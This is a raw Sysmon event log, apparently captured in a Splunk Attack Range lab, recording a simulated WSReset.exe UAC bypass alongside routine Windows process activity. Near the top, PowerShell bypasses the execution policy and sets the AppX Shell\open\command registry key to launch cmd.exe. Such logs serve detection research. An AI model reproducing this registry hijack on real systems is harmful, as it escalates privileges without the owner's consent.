Windows Store without changing account settings or deleting installed appsMicrosoft® Windows® Operating SystemMicrosoft CorporationWSReset.exe"C:\Windows\system32\WSReset.exe" C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=5181342124A0AB97F865A39581CE9C41,SHA256=FE7AF6AC7EA79AEA47BFF06035875DD1975590F78C31797526908C1A4877EE84,IMPHASH=279E04CF32068F56394D78D663C285A4{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Temp\test\ws.ps1'" 13241300x80000000000000001054821Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:08:03.492{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\(Default)C:\Windows\System32\cmd.exe /c start cmd.exe 13241300x80000000000000001054820Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:08:03.460{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\DelegateExecute(Empty) 12241200x80000000000000001054819Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteKey2021-07-12 08:08:03.444{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command 23542300x80000000000000001054818Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.206{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8CD9641D56F82BF278E858CA587D1971,SHA256=BB872FF80A17AE895E1E84C4AD5F2E34DBC6072DF567E9F269DEFDA9C228FDEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054817Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.206{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=313835DEA0AD20FAA887146FE1D0B887,SHA256=6EFF06AC0170AB73ACCABF7E0E9BD09ACF2A72F8544D4A4382B69128ADEEB9B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054816Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.175{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCCAEA37CEF4CB550BCF8940765431AE,SHA256=8A7CE53977F8D63111A1225248FCD6BB709772F68A34C10ABAFFA01A632A54C9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054815Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.144{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054814Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.144{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x80000000000000001054813Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:08:03.106{466BC892-F862-60EB-F97D-00000000CF01}9624\PSHost.132705508822201904.9624.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001054871Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.876{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3DE95903F6B136E741C27EF1CD62DC7,SHA256=53BB6A971A599198EBF14C8BFB53E40B757D33ED0EDCC6E37948E5F2A0DC15E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810418Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:04.543{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A52C77698F26B4220DA44B77F1E326B,SHA256=353CCD6F96F269A46E26CB7ECA80E9E5EABE9C76CB5A5B4DDE279307ACB6AD43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054870Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.661{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8CD9641D56F82BF278E858CA587D1971,SHA256=BB872FF80A17AE895E1E84C4AD5F2E34DBC6072DF567E9F269DEFDA9C228FDEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054869Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.308{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6B9C3A90617C7BD985A6C9EC63368B4,SHA256=C49548BEFA1292C4B8217D62A43E27C707171CE7743FC3582BDD73ACCB3AA048,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054868Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.123{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054867Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.123{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054866Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.123{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054865Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.107{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\Windows.UI.Immersive.dll+1d16|C:\Windows\System32\Windows.UI.Immersive.dll+2362|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1d03|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054864Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.107{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\Windows.UI.Immersive.dll+2f6d|C:\Windows\System32\Windows.UI.Immersive.dll+2213|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1d03|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001054863Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.091{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054862Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.091{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054861Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.091{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054860Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.091{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054859Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.091{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054858Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.091{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054857Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.091{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054856Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.076{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054855Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.076{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054854Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.076{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054853Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.076{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054852Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.076{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054873Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:05.877{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22C9D4C3FEB48F71B4AB5ACCAA1DEBF7,SHA256=D4013E211DFE7DF96BD6817A42155842A8E00D19DF43733C1F2991E4D645ECE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810420Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:05.543{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38D87E1A14FF4C466FD16DBD324A0C08,SHA256=D0142AB4AF2923C9E5504B37C4763408268904BD53390B047084B325903E442E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054872Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:56.617{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61973-false10.0.1.12-8000- 354300x8000000000000000810419Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:03.205{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57466-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001054879Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:06.877{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24D5F62B62108DB5B56356BE31FDF565,SHA256=46F7CB5B07034DDB01554D031B13A9E7D515ADB909690154661D494E47F84522,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810424Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:06.559{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=668C3C44B8405A8F24B26098CD9F6C01,SHA256=94AD872148815091F6A10056135A56D9DD7075439AE3246BB9E12D19286C09CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054878Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:06.546{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054877Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:06.476{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-57B0-60E8-6810-00000000CF01}7548C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001054876Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:06.476{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla 